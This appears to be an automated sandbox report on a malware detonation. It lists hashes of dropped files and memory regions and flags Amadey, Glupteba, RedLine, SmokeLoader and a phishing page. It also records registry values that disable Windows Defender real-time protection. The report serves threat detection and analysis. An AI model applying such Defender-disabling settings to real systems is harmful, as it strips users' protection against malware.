MD5 ab873524526f037ab21e3cb17b874f01
SHA1 0589229498b68ee0f329751ae130bd50261a19bd
SHA256 1c821461df42754405a1661ced3406fd519ae8b211fef952fcb6e03d718039cc
SHA512 608bbc1212a345f9e9c66b5d21624127d62d34da617380fce3ea8bfc6b703acfeb675fdd45e9765625f84ff20c3560d122076630a005e561598ae2783adc2c11

C:\Users\Admin\AppData\Local\Temp\7DED.exe

MD5 ab873524526f037ab21e3cb17b874f01
SHA1 0589229498b68ee0f329751ae130bd50261a19bd
SHA256 1c821461df42754405a1661ced3406fd519ae8b211fef952fcb6e03d718039cc
SHA512 608bbc1212a345f9e9c66b5d21624127d62d34da617380fce3ea8bfc6b703acfeb675fdd45e9765625f84ff20c3560d122076630a005e561598ae2783adc2c11

memory/2184-934-0x0000000074390000-0x0000000074A7E000-memory.dmp

memory/2184-935-0x0000000000E50000-0x00000000020D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 1c01927ac6e677d4f277cb9f7648ca70
SHA1 30d980c95b28c4856baef117e228d75e6a25e113
SHA256 c2efd2f57310cfa062ce5bc7bd1e87ef55c50412cf9e48d9765e0c2db08bf60a
SHA512 71989e394718c53042e4bc1242f2281610eea390eade147f248dae0a6b79954013654e8cd824e2f367d414758833aabe36f1581ad9d52e9ee63e905ce4d7473e

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 1c01927ac6e677d4f277cb9f7648ca70
SHA1 30d980c95b28c4856baef117e228d75e6a25e113
SHA256 c2efd2f57310cfa062ce5bc7bd1e87ef55c50412cf9e48d9765e0c2db08bf60a
SHA512 71989e394718c53042e4bc1242f2281610eea390eade147f248dae0a6b79954013654e8cd824e2f367d414758833aabe36f1581ad9d52e9ee63e905ce4d7473e

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 1c01927ac6e677d4f277cb9f7648ca70
SHA1 30d980c95b28c4856baef117e228d75e6a25e113
SHA256 c2efd2f57310cfa062ce5bc7bd1e87ef55c50412cf9e48d9765e0c2db08bf60a
SHA512 71989e394718c53042e4bc1242f2281610eea390eade147f248dae0a6b79954013654e8cd824e2f367d414758833aabe36f1581ad9d52e9ee63e905ce4d7473e

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 1c01927ac6e677d4f277cb9f7648ca70
SHA1 30d980c95b28c4856baef117e228d75e6a25e113
SHA256 c2efd2f57310cfa062ce5bc7bd1e87ef55c50412cf9e48d9765e0c2db08bf60a
SHA512 71989e394718c53042e4bc1242f2281610eea390eade147f248dae0a6b79954013654e8cd824e2f367d414758833aabe36f1581ad9d52e9ee63e905ce4d7473e

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

memory/2996-958-0x0000000002650000-0x0000000002A48000-memory.dmp

memory/2996-959-0x0000000002650000-0x0000000002A48000-memory.dmp

memory/2996-961-0x0000000002A50000-0x000000000333B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8FB9.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

C:\Users\Admin\AppData\Local\Temp\8FB9.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

memory/2996-970-0x0000000000400000-0x0000000000D1B000-memory.dmp

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

C:\Users\Admin\AppData\Local\Temp\kos2.exe

MD5 665db9794d6e6e7052e7c469f48de771
SHA1 ed9a3f9262f675a03a9f1f70856e3532b095c89f
SHA256 c1b31186d170a2a5755f15682860b3cdc60eac7f97a2db9462dee7ca6fcbc196
SHA512 69585560e8ac4a2472621dd4da4bf0e636688fc5d710521b0177461f773fcf2a4c7ddb86bc812ecb316985729013212ccfa4992cd1c98f166a4a510e17fcae74

memory/2540-980-0x00000000009D0000-0x0000000000B4E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kos2.exe

MD5 665db9794d6e6e7052e7c469f48de771
SHA1 ed9a3f9262f675a03a9f1f70856e3532b095c89f
SHA256 c1b31186d170a2a5755f15682860b3cdc60eac7f97a2db9462dee7ca6fcbc196
SHA512 69585560e8ac4a2472621dd4da4bf0e636688fc5d710521b0177461f773fcf2a4c7ddb86bc812ecb316985729013212ccfa4992cd1c98f166a4a510e17fcae74

\Users\Admin\AppData\Local\Temp\kos2.exe

MD5 665db9794d6e6e7052e7c469f48de771
SHA1 ed9a3f9262f675a03a9f1f70856e3532b095c89f
SHA256 c1b31186d170a2a5755f15682860b3cdc60eac7f97a2db9462dee7ca6fcbc196
SHA512 69585560e8ac4a2472621dd4da4bf0e636688fc5d710521b0177461f773fcf2a4c7ddb86bc812ecb316985729013212ccfa4992cd1c98f166a4a510e17fcae74

memory/2540-982-0x0000000074390000-0x0000000074A7E000-memory.dmp

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

\Users\Admin\AppData\Local\Temp\set16.exe

MD5 b224196c88f09b615527b2df0e860e49
SHA1 f9ae161836a34264458d8c0b2a083c98093f1dec
SHA256 2a11969fcc1df03533ad694a68d56f0e3a67ce359663c3cf228040ab5baa5ed8
SHA512 d74376c5bd3ba19b8454a17f2f38ab64ad1005b6372c7e162230c822c38f6f8c7d87aef47ef04cb6dceedc731046c30efa6720098cc39b15addd17c809b8296d

memory/1808-995-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2184-1003-0x0000000074390000-0x0000000074A7E000-memory.dmp

memory/2540-1002-0x0000000074390000-0x0000000074A7E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\963F.exe

MD5 dd007c4e6d34d7270ec93a99f14e2793
SHA1 a168c1b975d3268646f2443444f805e7f5dd0312
SHA256 df696ba95cdd47b74f8393c8a27cf824cb39c0a0613d65708c12cbf988cf0852
SHA512 cd834e05639c3b6ced81071f1aa1bb62955fe667b1106f54d67acc74d4eefd778ff869040ccb14517d13a0c51ce63b1a4222f008b2ff33b48d12bcde66a3b3f6

memory/940-1008-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/880-1011-0x0000000000884000-0x0000000000897000-memory.dmp

memory/880-1012-0x00000000002B0000-0x00000000002B9000-memory.dmp

memory/940-1010-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1392-1024-0x0000000000220000-0x000000000027A000-memory.dmp

memory/552-1023-0x0000000000120000-0x0000000000128000-memory.dmp

memory/2248-1050-0x0000000010000000-0x000000001057B000-memory.dmp

memory/552-1053-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp

memory/1392-1054-0x0000000074390000-0x0000000074A7E000-memory.dmp

memory/940-1055-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1392-1057-0x00000000045C0000-0x0000000004600000-memory.dmp

memory/932-1056-0x0000000001F30000-0x000000000261F000-memory.dmp

memory/2248-1058-0x0000000001210000-0x00000000018FF000-memory.dmp

memory/2996-1059-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2248-1060-0x0000000000870000-0x0000000000F5F000-memory.dmp

memory/2248-1061-0x0000000000870000-0x0000000000F5F000-memory.dmp

memory/2248-1062-0x0000000000870000-0x0000000000F5F000-memory.dmp

memory/1976-1063-0x0000000003100000-0x0000000003327000-memory.dmp

memory/1516-1064-0x0000000000400000-0x0000000000627000-memory.dmp

memory/940-1068-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1516-1072-0x0000000000D50000-0x0000000000F77000-memory.dmp

memory/552-1075-0x000000001A8E0000-0x000000001A960000-memory.dmp

memory/1392-1076-0x0000000000400000-0x000000000047E000-memory.dmp

memory/1516-1074-0x0000000000D50000-0x0000000000F77000-memory.dmp

memory/1380-1066-0x0000000003F10000-0x0000000003F26000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/1808-1088-0x0000000000400000-0x0000000000413000-memory.dmp

memory/572-1089-0x000000013F6C0000-0x000000013FC61000-memory.dmp

memory/1976-1090-0x0000000000400000-0x00000000004CF000-memory.dmp

memory/2996-1091-0x0000000002650000-0x0000000002A48000-memory.dmp

memory/2996-1093-0x0000000002A50000-0x000000000333B000-memory.dmp

memory/2996-1094-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2996-1095-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1392-1100-0x0000000074390000-0x0000000074A7E000-memory.dmp

memory/552-1101-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp

memory/1516-1104-0x0000000000D50000-0x0000000000F77000-memory.dmp

memory/1516-1106-0x0000000000D50000-0x0000000000F77000-memory.dmp

memory/932-1107-0x0000000001F30000-0x000000000261F000-memory.dmp

memory/1516-1103-0x0000000000400000-0x0000000000627000-memory.dmp

memory/2248-1110-0x0000000000870000-0x0000000000F5F000-memory.dmp

memory/2248-1111-0x0000000000870000-0x0000000000F5F000-memory.dmp

memory/2248-1112-0x0000000000870000-0x0000000000F5F000-memory.dmp

memory/552-1114-0x000000001A8E0000-0x000000001A960000-memory.dmp

memory/1976-1113-0x0000000003100000-0x0000000003327000-memory.dmp

memory/2592-1116-0x0000000000400000-0x0000000000627000-memory.dmp

memory/1976-1115-0x0000000003100000-0x0000000003327000-memory.dmp

memory/2592-1117-0x0000000000BE0000-0x0000000000E07000-memory.dmp

memory/2592-1118-0x0000000000BE0000-0x0000000000E07000-memory.dmp

memory/1516-1109-0x0000000000400000-0x0000000000627000-memory.dmp

memory/1040-1143-0x0000000000C10000-0x0000000000FF0000-memory.dmp

memory/1040-1144-0x0000000074390000-0x0000000074A7E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d9572eee2f9841df36cf53ab959a60b6
SHA1 493085b14416ffcd8927dbf8f71b5f2ae3ef18f9
SHA256 8221e9519efa090df3d20419d6ce06604d2cbb4c1ddb23fc6b2a806ab2d49975
SHA512 d1ecf18391c2816b0e67634c03a8c5774e533839c80f53c34fbbc675228cc602ed7156a8c9756337584fe8a75cd12312579d1847cbe885dd4f5a8c81ea684fb0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 73f8bccfebbee369f96f299a81f27526
SHA1 01e3f44a6f0b27ec590daa6f84d2ada1755876dd
SHA256 ecd14252da9e51228b126eafa0fb4e98f9e9c56a100730a0b8ae79558260b026
SHA512 6bb316ca721e841d5e0b8635502e5d62aab41479244a51b12e435edae42ca4b3d09daae4a83d7423b58ff474ab2682c4b311b15cd2b4edf287fb147b1d94a688

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 71c0bf04e7e8e7220490b232ec18a25b
SHA1 79a96e7e0e5d3497e126f9e89f9bb49146b05a0b
SHA256 d26bf7909df92cb411412a9325b8bdd8bacebd1aa4963198257caaa531abf4a4
SHA512 378e2a4c0a2ec47c07f0c00632d83926290ef85b9a971f4e9c92bc97c8d17bd2f01fe726b84670251e08056e32593ae330435e6a245924853a9197fb0d3aba5b

memory/1612-1271-0x000007FEEF080000-0x000007FEEFA1D000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6e0c4069324ed8da51fd41d1ad62a813
SHA1 4f2027827b093334829b5168d85cb2b1cb39c7b8
SHA256 134349c99b22ba0cddb056c899bb8267f8e95f50ec51695f47081c5c61422bf9
SHA512 a3a5cf7d7987e6f5c2eedbc5d12b50e89f482091d0d69d043f6b3f226e450a5102449e3e0a8c9bf2883d4d9634bc8ce1bf2e78819c3c27992875adcc40532601

memory/2996-1272-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1612-1292-0x00000000024F0000-0x0000000002570000-memory.dmp

memory/1612-1293-0x00000000024F0000-0x0000000002570000-memory.dmp

memory/1612-1296-0x000007FEEF080000-0x000007FEEFA1D000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 56189096d6240d6a481c2dc6279579ec
SHA1 27c209431e6d654fbda2eba392661d0cd9baaa3e
SHA256 062e8011893cee7a195a8ad9ca565064ce70f04b78b881d47e97ffe2eaf58022
SHA512 0f42930763daf1e9d6e65d8a609ffdad7360faa54b5f5634da21b1c0e592c89743d80d3c681e79083433def08084562c34b155c03d56cde0cdc417092b438de4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d7355c10914bc179f4d196a60a9d2378
SHA1 ae47637defa72299443530f1928de10a2cd50be7
SHA256 22dd109f3bae88dcd4fccee76a8d40246fdfb56d62b0fe1c492a569ccb8045aa
SHA512 dd1d6f12a04437d96063f66993ba32dc815e71738858e8907abc0d5db161e418cc0fb6b633ffb3c23a9e0835bdf555c016511a61ac5cb1fdfc1554a1895744ba

memory/2996-1351-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2968-1350-0x000000013FD00000-0x0000000140810000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5a22eb778d69ca473fa705a17129bdbf
SHA1 f54a4e580524b09c4b21ba973102e9be0d8dc841
SHA256 88d84c8855582624569ad506bae512d46744448d9bed251369695771271c11b2
SHA512 36fa24636fc102b4087bc10792fae684665704aa1380156447a428590630dd2341b5935cc60acab6a41db980589d8bd8ea05a3a7f0d64230a340ed19510aa730

memory/2592-1411-0x0000000000400000-0x0000000000627000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VXGUP3X49OWRP7KDQ6OP.temp

MD5 9c2d1cc25d25f345c927a621d20327a0
SHA1 fc269688d0d621a064b23eff73cc3e83873c1056
SHA256 66c07556c62bd743f275fbcc3f03135243673043618273c580b97601cd9147b8
SHA512 8f0d3a55fa76c6ff8efe3ac9430dcc354f83e940fec0f32c5af4292ed262820249bbad3972b6433f3a525dc064ca1ffcfdab5d5e54e266e83d00a631f15c4c97

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d27e126290b4612e94ef09d27604b6dd
SHA1 02f5eba312b4b0ff2b29092329bce108062c1f38
SHA256 c2681706004880bf107cd3e0cab499ee296ddbec2c7cec7ae1f7ee6fdd8d3250
SHA512 851b90b9a160cf7b6fe64703dbd872d5bb78528b0dc52d688fda78b8200ee4dc5fdbf3f8208a8fdfab37d5ba5285c0f36613571c5072f1a5212337e7499ccce2

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\QLkXvZI.exe

MD5 cd3191644eeaab1d1cf9b4bea245f78c
SHA1 75f04b22e62b1366a4c5b2887242b63de1d83c9c
SHA256 f626f7361d341ca2b7c67c2b20ca5ab516a6ce4104048c5a3ee3f2d83cc3039f
SHA512 79ebd59d2f66bf3f4417760ff1c9021b3d0e3dcb65da390bf377c3316ce675add82b79bd90750e9b98f68bd5a5625c2b863fadbd0bf447c372b14a619e43d57a

memory/912-1464-0x0000000002560000-0x0000000002958000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 78a89a4108714a6685a38fd37fb4aa46
SHA1 bcea8ae459f00239eacf8e4225c5ac199180775d
SHA256 341118b8e67ca2c44cb94b03c584f47fec0b1be0dea509a3959a5264194d51d4
SHA512 1eacc94c1d8cb89c0e2849b4692df6a1c0862f6fc233de144fd4ecc6ea7cf819f778c80d557c14b4e0899b5cb1e9b32cf44a91fafe7dc866a95797924ca5ae1a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9ef17c405e670b1d8b05bcf9a2707aa8
SHA1 9726fe788197731d40eae4e8a82aeafcf28707f3
SHA256 44638fdb621a92f9577e1324ecf4a64019d9ef21a58ed72d63b9aa5be594440a
SHA512 6238fead41d95e152356b5d770415eafdd3ee45d3c461090ae2cab2ec5546f44a029b312d25909f2dc1fe376c83131c7c50853c0f6401cb357df59ae121dc4c5

memory/572-1620-0x000000013F6C0000-0x000000013FC61000-memory.dmp

memory/2676-1631-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2676-1629-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2676-1635-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2676-1633-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2676-1628-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2676-1627-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2676-1626-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2676-1625-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 22d95051099732f4c979df08399fcbd6
SHA1 2c4f08067e92dc29ae3b0e34fd5a7f57fc215336
SHA256 e4fb1644ddfba17c8bc650dfad143b69c7e1474ba84326449f2c4c99caa17515
SHA512 46ac10de863f7ddeac938495c9844ab2788712a811b18640a1b4454771177e9f724b12b68b9e035438137a1b39e55d8e60c2bac657b649a67ac8697f743b7e6c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\04e2bwzs.default-release\prefs.js

MD5 9d5de01d89783eee4317637007761db5
SHA1 63ae95485da69e38c326e050e375903e8f2b8f2e
SHA256 84e4884b2df5c8a420730c66e6e2048885007f447c8cdc6b285b0b0c7f5a8ddb
SHA512 4e78bd4c1a39863541108ef1abcbb5c78fb42c36cc75de15fcdbe30070e5f685a89ffbb12f5e19165e0a66e3b478af3ac05707ce100ef1eae4c603df44342e8c

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-25 04:50

Reported

2023-10-25 04:57

Platform

win10-20231023-en

Max time kernel

301s

Max time network

306s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Detected google phishing page

phishing google

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\FAFE.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\FAFE.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\FAFE.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\FAFE.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\FAFE.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
